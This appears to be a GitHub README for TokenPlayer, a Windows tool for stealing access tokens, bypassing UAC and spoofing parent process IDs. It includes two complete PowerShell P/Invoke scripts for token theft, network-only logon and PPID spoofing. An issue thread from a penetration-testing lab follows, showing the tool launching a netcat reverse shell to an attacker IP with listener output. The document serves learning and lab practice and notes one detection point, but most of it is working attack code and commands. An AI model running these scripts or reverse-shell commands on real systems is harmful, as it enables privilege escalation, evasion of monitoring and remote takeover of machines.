
TokenPlayer

Manipulating and Abusing Windows Access Tokens.

TokenPlayer is a small tool I wrote to learn Win32 API programming and to better understand the Windows access token model.

Features:

  • Stealing and impersonating primary tokens.
  • Impersonating protected processes.
  • Bypassing UAC with the token-duplication method.
  • Creating new tokens for network-only authentication from supplied credentials (similar to runas /netonly), without requiring special privileges or an elevated context.
  • Spoofing the parent process ID, so that a process is spawned under an alternative parent.
  • Executing any application with supplied arguments under an impersonated context.
  • Usable from non-interactive contexts (e.g. a reverse shell): parent and child communicate over pipes.

Usage:

General options:
  --help                 Display help menu.

Impersonation Options:
  --impersonate          Impersonates the token of the specified PID and spawns a
                         new child process under its context.
  --pid arg              Process ID to steal the token from.
  --spawn                Spawns a new command prompt under the context of the
                         stolen token.

Execution Options:
  --exec                 Execute an instance of the specified program under the
                         impersonated context.
  --pid arg              Process ID to steal the token from.
  --prog arg             The full path to the program to be executed.
  --args arg             Optional execution arguments for the specified
                         program.

Make Token Options:
  --maketoken            Create a new process whose supplied credentials are used
                         for network authentication only (similar to runas /netonly).
  --username arg         Username.
  --password arg         Password in plaintext.
  --domain arg           The domain the user belongs to; if no domain is
                         specified, the local machine is used.

UAC Bypass Options:
  --pwnuac               Will try to bypass UAC using the token-duplication
                         method.
  --spawn                Spawns a new elevated prompt.
  --prog arg             The full path to the program to be executed.
  --args arg             Optional execution arguments for the specified
                         program.

Parent Process Spoofing Options:
  --spoofppid            Spawn a new instance of an application with spoofed
                         parent process.
  --ppid arg             The PID of the parent process.
  --prog arg             The full path to the program to be executed.
  --args arg             Optional execution arguments for the specified
                         program.

Usage 1: Token Impersonation

Using same console:

Token Impersonation

Spawning a new console:

Token Impersonation In New Window

Usage 2: Executing an application (e.g. a reverse shell)

Executing Reverse Shell

Usage 3: Make Token

Make Token
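The two usages above (token impersonation in Usage 1, network-only tokens in Usage 3) map onto a handful of Win32 calls. The following PowerShell P/Invoke script is an added example, not TokenPlayer's own code: it reproduces the call sequence the tool itself reports (OpenProcess, OpenProcessToken, DuplicateTokenEx, CreateProcessWithTokenW) and pairs it with the CreateProcessWithLogonW flag that gives runas /netonly semantics. The class name TokenApi, the function names, the target PID and the credentials in the usage lines are placeholders; it is meant to be run from an elevated PowerShell in which SeDebugPrivilege is already enabled (the tool enables it itself, as its log shows).

```powershell
$src = @'
using System;
using System.Runtime.InteropServices;
public static class TokenApi {                     // hypothetical helper class for this example
    [StructLayout(LayoutKind.Sequential)]
    public struct STARTUPINFO {                    // STARTUPINFOW; string members kept as raw pointers (NULL)
        public uint cb;
        public IntPtr lpReserved, lpDesktop, lpTitle;
        public uint dwX, dwY, dwXSize, dwYSize, dwXCountChars, dwYCountChars, dwFillAttribute, dwFlags;
        public ushort wShowWindow, cbReserved2;
        public IntPtr lpReserved2, hStdInput, hStdOutput, hStdError;
    }
    [StructLayout(LayoutKind.Sequential)]
    public struct PROCESS_INFORMATION { public IntPtr hProcess, hThread; public uint dwProcessId, dwThreadId; }
    public const uint PROCESS_QUERY_LIMITED_INFORMATION = 0x1000; // enough for OpenProcessToken, also on protected processes
    public const uint TOKEN_DUPLICATE = 0x0002, MAXIMUM_ALLOWED = 0x02000000;
    public const int  SecurityImpersonation = 2, TokenPrimary = 1;
    public const uint LOGON_NETCREDENTIALS_ONLY = 0x2, CREATE_NEW_CONSOLE = 0x10;
    [DllImport("kernel32.dll", SetLastError = true)]
    public static extern IntPtr OpenProcess(uint access, bool inherit, uint pid);
    [DllImport("advapi32.dll", SetLastError = true)]
    public static extern bool OpenProcessToken(IntPtr hProcess, uint access, out IntPtr hToken);
    [DllImport("advapi32.dll", SetLastError = true)]
    public static extern bool DuplicateTokenEx(IntPtr hToken, uint access, IntPtr attrs, int impLevel, int tokenType, out IntPtr hNew);
    [DllImport("advapi32.dll", SetLastError = true, CharSet = CharSet.Unicode)]
    public static extern bool CreateProcessWithTokenW(IntPtr hToken, uint logonFlags, string app, string cmdline,
        uint creationFlags, IntPtr env, string cwd, ref STARTUPINFO si, out PROCESS_INFORMATION pi);
    [DllImport("advapi32.dll", SetLastError = true, CharSet = CharSet.Unicode)]
    public static extern bool CreateProcessWithLogonW(string user, string domain, string password, uint logonFlags,
        string app, string cmdline, uint creationFlags, IntPtr env, string cwd, ref STARTUPINFO si, out PROCESS_INFORMATION pi);
    [DllImport("kernel32.dll", SetLastError = true)]
    public static extern bool CloseHandle(IntPtr h);
}
'@
Add-Type -TypeDefinition $src

function Get-Win32Error { [Runtime.InteropServices.Marshal]::GetLastWin32Error() }

function Start-ProcessWithStolenToken {
    param([Parameter(Mandatory)][int]$TargetPid, [string]$Program = 'C:\Windows\System32\cmd.exe', [string]$Arguments = '')
    # Caller needs SeDebugPrivilege (enabled) to open another user's process and SeImpersonatePrivilege
    # for CreateProcessWithTokenW; an elevated administrator holds both.
    $hProc = [TokenApi]::OpenProcess([TokenApi]::PROCESS_QUERY_LIMITED_INFORMATION, $false, $TargetPid)
    if ($hProc -eq [IntPtr]::Zero) { throw "OpenProcess($TargetPid) failed, error $(Get-Win32Error)" }
    $hTok = [IntPtr]::Zero; $hDup = [IntPtr]::Zero
    try {
        # TOKEN_DUPLICATE is the only right we need on the victim's primary token.
        if (-not [TokenApi]::OpenProcessToken($hProc, [TokenApi]::TOKEN_DUPLICATE, [ref]$hTok)) {
            throw "OpenProcessToken failed, error $(Get-Win32Error)" }
        # Duplicate into a fresh primary token that we own; CreateProcessWithTokenW rejects impersonation tokens.
        if (-not [TokenApi]::DuplicateTokenEx($hTok, [TokenApi]::MAXIMUM_ALLOWED, [IntPtr]::Zero,
                [TokenApi]::SecurityImpersonation, [TokenApi]::TokenPrimary, [ref]$hDup)) {
            throw "DuplicateTokenEx failed, error $(Get-Win32Error)" }
        $si = New-Object TokenApi+STARTUPINFO; $si.cb = [Runtime.InteropServices.Marshal]::SizeOf($si)
        $pi = New-Object TokenApi+PROCESS_INFORMATION
        if (-not [TokenApi]::CreateProcessWithTokenW($hDup, 0, $Program, ('"{0}" {1}' -f $Program, $Arguments),
                [TokenApi]::CREATE_NEW_CONSOLE, [IntPtr]::Zero, $null, [ref]$si, [ref]$pi)) {
            throw "CreateProcessWithTokenW failed, error $(Get-Win32Error)" }
        [void][TokenApi]::CloseHandle($pi.hProcess); [void][TokenApi]::CloseHandle($pi.hThread)
        return $pi.dwProcessId
    } finally {
        foreach ($h in $hDup, $hTok, $hProc) { if ($h -ne [IntPtr]::Zero) { [void][TokenApi]::CloseHandle($h) } }
    }
}

function Start-ProcessNetOnly {
    param([Parameter(Mandatory)][string]$Username, [Parameter(Mandatory)][string]$Password,
          [string]$Domain = '.', [string]$Program = 'C:\Windows\System32\cmd.exe', [string]$Arguments = '')
    # LOGON_NETCREDENTIALS_ONLY is what runas /netonly uses: the child runs locally as the current user,
    # but outbound network authentication presents the supplied credentials. No privilege is required and
    # the password is not validated locally, so a typo only shows up as failed logons on remote hosts.
    # Documented limitation: this API cannot be called from a process running as LocalSystem.
    $si = New-Object TokenApi+STARTUPINFO; $si.cb = [Runtime.InteropServices.Marshal]::SizeOf($si)
    $pi = New-Object TokenApi+PROCESS_INFORMATION
    if (-not [TokenApi]::CreateProcessWithLogonW($Username, $Domain, $Password, [TokenApi]::LOGON_NETCREDENTIALS_ONLY,
            $Program, ('"{0}" {1}' -f $Program, $Arguments), [TokenApi]::CREATE_NEW_CONSOLE, [IntPtr]::Zero, $null,
            [ref]$si, [ref]$pi)) { throw "CreateProcessWithLogonW failed, error $(Get-Win32Error)" }
    [void][TokenApi]::CloseHandle($pi.hProcess); [void][TokenApi]::CloseHandle($pi.hThread)
    return $pi.dwProcessId
}

# Usage from an elevated PowerShell; PID and credentials are placeholders.
# Start-ProcessWithStolenToken -TargetPid 1708
# Start-ProcessNetOnly -Username david -Password 'Passw0rd!' -Domain xor.com
```

Two points worth checking when this fails: OpenProcess with PROCESS_QUERY_LIMITED_INFORMATION is deliberately the weakest request that still lets OpenProcessToken succeed (Windows 8.1 and later), which is why a token can be taken even from a protected process that refuses PROCESS_QUERY_INFORMATION; and the netonly path succeeds with any password, because the credentials are only exercised when the child first authenticates to a remote host.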

Usage 4: UAC Bypass

UAC Bypass

Usage 5: PPID Spoofing

PPID Spoofing
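The PPID spoofing shown above is done through the documented PROC_THREAD_ATTRIBUTE_PARENT_PROCESS attribute of CreateProcess. The script below is an added example, not TokenPlayer's code: it spawns a process under a chosen parent and then runs the check a defender relying on Win32_Process would run. The class name PpidApi and the function name are placeholders, explorer.exe is assumed to be running (an interactive desktop session), and notepad.exe is the assumed child.

```powershell
$src = @'
using System;
using System.Runtime.InteropServices;
public static class PpidApi {                      // hypothetical helper class for this example
    [StructLayout(LayoutKind.Sequential)]
    public struct STARTUPINFOEX {                  // STARTUPINFOW members followed by lpAttributeList, laid out flat
        public uint cb;
        public IntPtr lpReserved, lpDesktop, lpTitle;
        public uint dwX, dwY, dwXSize, dwYSize, dwXCountChars, dwYCountChars, dwFillAttribute, dwFlags;
        public ushort wShowWindow, cbReserved2;
        public IntPtr lpReserved2, hStdInput, hStdOutput, hStdError;
        public IntPtr lpAttributeList;
    }
    [StructLayout(LayoutKind.Sequential)]
    public struct PROCESS_INFORMATION { public IntPtr hProcess, hThread; public uint dwProcessId, dwThreadId; }
    public const uint PROCESS_CREATE_PROCESS = 0x0080;          // the only right needed on the chosen parent
    public const uint EXTENDED_STARTUPINFO_PRESENT = 0x00080000, CREATE_NEW_CONSOLE = 0x10;
    public static readonly IntPtr PROC_THREAD_ATTRIBUTE_PARENT_PROCESS = (IntPtr)0x00020000;
    [DllImport("kernel32.dll", SetLastError = true)]
    public static extern IntPtr OpenProcess(uint access, bool inherit, uint pid);
    [DllImport("kernel32.dll", SetLastError = true)]
    public static extern bool InitializeProcThreadAttributeList(IntPtr list, int count, int flags, ref IntPtr size);
    [DllImport("kernel32.dll", SetLastError = true)]
    public static extern bool UpdateProcThreadAttribute(IntPtr list, uint flags, IntPtr attribute, IntPtr value,
        IntPtr cbSize, IntPtr previous, IntPtr returnSize);
    [DllImport("kernel32.dll")]
    public static extern void DeleteProcThreadAttributeList(IntPtr list);
    [DllImport("kernel32.dll", SetLastError = true, CharSet = CharSet.Unicode)]
    public static extern bool CreateProcessW(string app, string cmdline, IntPtr procAttrs, IntPtr threadAttrs,
        bool inheritHandles, uint creationFlags, IntPtr env, string cwd, ref STARTUPINFOEX si, out PROCESS_INFORMATION pi);
    [DllImport("kernel32.dll", SetLastError = true)]
    public static extern bool CloseHandle(IntPtr h);
}
'@
Add-Type -TypeDefinition $src

function Start-ProcessWithSpoofedParent {
    param([Parameter(Mandatory)][int]$ParentPid, [string]$Program = 'C:\Windows\System32\notepad.exe', [string]$Arguments = '')
    $M = [Runtime.InteropServices.Marshal]
    # Open the intended parent with PROCESS_CREATE_PROCESS; that is the access the kernel checks for this attribute.
    $hParent = [PpidApi]::OpenProcess([PpidApi]::PROCESS_CREATE_PROCESS, $false, $ParentPid)
    if ($hParent -eq [IntPtr]::Zero) { throw "OpenProcess($ParentPid) failed, error $($M::GetLastWin32Error())" }
    # Size, allocate and initialise a one-entry attribute list (the first call only reports the size).
    $size = [IntPtr]::Zero
    [void][PpidApi]::InitializeProcThreadAttributeList([IntPtr]::Zero, 1, 0, [ref]$size)
    $list = $M::AllocHGlobal($size)
    if (-not [PpidApi]::InitializeProcThreadAttributeList($list, 1, 0, [ref]$size)) { throw 'InitializeProcThreadAttributeList failed' }
    # The attribute value is a pointer to a HANDLE, so the handle must live in unmanaged memory.
    $pHandle = $M::AllocHGlobal([IntPtr]::Size)
    $M::WriteIntPtr($pHandle, $hParent)
    if (-not [PpidApi]::UpdateProcThreadAttribute($list, 0, [PpidApi]::PROC_THREAD_ATTRIBUTE_PARENT_PROCESS,
            $pHandle, [IntPtr]([IntPtr]::Size), [IntPtr]::Zero, [IntPtr]::Zero)) { throw 'UpdateProcThreadAttribute failed' }
    $si = New-Object PpidApi+STARTUPINFOEX; $si.cb = $M::SizeOf($si); $si.lpAttributeList = $list
    $pi = New-Object PpidApi+PROCESS_INFORMATION
    # EXTENDED_STARTUPINFO_PRESENT tells CreateProcess that si is a STARTUPINFOEX carrying the attribute list.
    $ok = [PpidApi]::CreateProcessW($Program, ('"{0}" {1}' -f $Program, $Arguments), [IntPtr]::Zero, [IntPtr]::Zero, $false,
            ([PpidApi]::EXTENDED_STARTUPINFO_PRESENT -bor [PpidApi]::CREATE_NEW_CONSOLE), [IntPtr]::Zero, $null, [ref]$si, [ref]$pi)
    $err = $M::GetLastWin32Error()
    [PpidApi]::DeleteProcThreadAttributeList($list); $M::FreeHGlobal($list); $M::FreeHGlobal($pHandle)
    [void][PpidApi]::CloseHandle($hParent)
    if (-not $ok) { throw "CreateProcessW failed, error $err" }
    [void][PpidApi]::CloseHandle($pi.hProcess); [void][PpidApi]::CloseHandle($pi.hThread)
    return $pi.dwProcessId
}

# Check: the child claims explorer.exe as its parent even though this PowerShell process created it.
$fakeParent = (Get-Process explorer | Select-Object -First 1).Id
$child = Start-ProcessWithSpoofedParent -ParentPid $fakeParent
$reported = (Get-CimInstance Win32_Process -Filter "ProcessId = $child").ParentProcessId
"child $child reports parent $reported (explorer is $fakeParent; the real creator is PID $PID)"
```

The last line is the point of the technique: Win32_Process, and anything built on the same ParentProcessId field, reports the chosen parent. The process that actually made the call is only visible in telemetry that records the calling process independently, such as the process ID in the header of the Microsoft-Windows-Kernel-Process ProcessStart ETW event, which is where detection of this technique usually has to start.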

Compile Instructions

To compile it yourself you will need the Boost library, which is used for parsing and handling the command-line arguments. You will also need to point the project's settings at the folder containing the external library.

Contributors

s1ckb0y1337


Issues

stdout issues?

Hi Mr SlickMeister, I encountered your tool, finally got it all compiled (with Boost), was able to execute the exe just fine, but then for some reason my stdout was not echoing the command results.

UPDATE: I don't think stdout is the issue anymore, but something with the user profile, and maybe something about the domain user I am switching to, "xor\david", not having a local login? After all this troubleshooting, I haven't been able to narrow down the cause.

Victim machine (OffSec PWK labs, IP 10.11.1.122):

Host Name:                 XOR-APP07
OS Name:                   Microsoft Windows Server 2019 Standard
OS Version:                10.0.17763 N/A Build 17763
OS Manufacturer:           Microsoft Corporation
OS Configuration:          Member Server
OS Build Type:             Multiprocessor Free
Registered Owner:          Windows User
Registered Organization:   
Product ID:                00429-70000-00000-AA411
Original Install Date:     5/20/2019, 5:01:32 PM
System Boot Time:          9/15/2021, 4:12:49 PM
System Manufacturer:       VMware, Inc.
System Model:              VMware Virtual Platform
System Type:               x64-based PC
Processor(s):              1 Processor(s) Installed.
                           [01]: AMD64 Family 23 Model 1 Stepping 2 AuthenticAMD ~3094 Mhz
BIOS Version:              Phoenix Technologies LTD 6.00, 11/12/2020
Windows Directory:         C:\Windows
System Directory:          C:\Windows\system32
Boot Device:               \Device\HarddiskVolume1
System Locale:             en-us;English (United States)
Input Locale:              en-us;English (United States)
Time Zone:                 (UTC-08:00) Pacific Time (US & Canada)
Total Physical Memory:     4,095 MB
Available Physical Memory: 3,326 MB
Virtual Memory: Max Size:  4,799 MB
Virtual Memory: Available: 4,079 MB
Virtual Memory: In Use:    720 MB
Page File Location(s):     C:\pagefile.sys
Domain:                    xor.com

notepad.exe                   1708 Services                   0      4,032 K Unknown         xor\david 

PS C:\Windows\TEMP> 
./TokenPlayer.exe --pid 1708 --exec --prog C:\\Windows\\System32\\cmd.exe --args "/c C:\Windows\TEMP\nc.exe 192.168.119.135 443 -e cmd.exe"
./TokenPlayer.exe --pid 1708 --exec --prog C:\\Windows\\System32\\cmd.exe --args "/c C:\Windows\TEMP\nc.exe 192.168.119.135 443 -e cmd.exe"
[+]Elevated Context Found
[*]Enabling SeDebugPrivilege
[+]SeDebugPrivilege ENABLED
[+]Target PID: 1708
[+]OpenProcess() succeed!
[+]OpenProcessToken() succeed!
[+]DuplicateTokenEx() succeed!
[+]CreateProcessWithTokenW() succeed!
[+]Proccess spawned with PID: 3148

RESULT ON ATTACKER MACHINE:

> nc -nlvp 443 
Ncat: Version 7.92 ( https://nmap.org/ncat )
Ncat: Listening on :::443
Ncat: Listening on 0.0.0.0:443
Ncat: Connection from 10.11.1.122.
Ncat: Connection from 10.11.1.122:49749.
Microsoft Windows [Version 10.0.17763.504]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Windows\system32>whoami
whoami

C:\Windows\system32>

C:\Windows\system32>^C

Same result with netcat-traditional.

I can change directories with the proper output:

C:\Windows\system32>cd ..
cd ..

C:\Windows>cd ..
cd ..

C:\>

I believe the commands are being executed, just not reflected to the screen... weird.

ATTACKER:

C:\>echo test > test.txt
echo test > test.txt

C:\>

VICTIM:

    Directory: C:\


Mode                LastWriteTime         Length Name                                                                  
----                -------------         ------ ----                                                                  
d-----        9/15/2018  12:19 AM                PerfLogs                                                              
d-r---       12/13/2019   6:35 AM                Program Files                                                         
d-----        9/15/2018   2:08 AM                Program Files (x86)                                                   
d-r---       12/28/2021   6:50 PM                Users                                                                 
d-----       12/28/2021   3:52 PM                Windows                                                               
-a----       12/28/2021   6:57 PM              7 test.txt                                                              


cat test.txt
cat test.txt
test 
PS C:\> 

Subsequent shells (those spawned from the new process with the impersonated token) are treated this way.

UPDATE: I've seemingly narrowed the issues down to 'whoami' and invoking a PowerShell prompt.
whoami - does not work

echo %USERNAME%
david

^this does.

Also, I am unable either to switch to a PowerShell prompt or to invoke the prompt via netcat.

netcat:
./TokenPlayer.exe --pid 2156 --exec --prog C:\\Windows\\System32\\cmd.exe --args "/c C:\Windows\TEMP\nc.exe 192.168.119.135 443 -e C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"

=

> rlwrap nc -nlvp 443
Ncat: Version 7.92 ( https://nmap.org/ncat )
Ncat: Listening on :::443
Ncat: Listening on 0.0.0.0:443
Ncat: Connection from 10.11.1.122.
Ncat: Connection from 10.11.1.122:49727.

^ then the connection drops

When I catch a standard command prompt and try to switch to PowerShell, the session does not drop, it just doesn't do anything.

Victim:

pwd

Path           
----           
C:\windows\temp



PS C:\windows\temp> 

Attacker:

> rlwrap nc -nlvp 443
Ncat: Version 7.92 ( https://nmap.org/ncat )
Ncat: Listening on :::443
Ncat: Listening on 0.0.0.0:443
Ncat: Connection from 10.11.1.122.
Ncat: Connection from 10.11.1.122:49729.
Microsoft Windows [Version 10.0.17763.504]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\system32>

C:\Windows\system32>

powershell.exe
powershell.exe

C:\Windows\system32>

pwd
pwd
'pwd' is not recognized as an internal or external command,
operable program or batch file.

powershell -c pwd
powershell -c pwd

C:\Windows\system32>

C:\Windows\system32>

ANOTHER UPDATE:

C:\windows\temp\sche.ps1
Not enough memory resources are available to process this command.

I don't quite understand how this would be related, but I don't get this error normally.
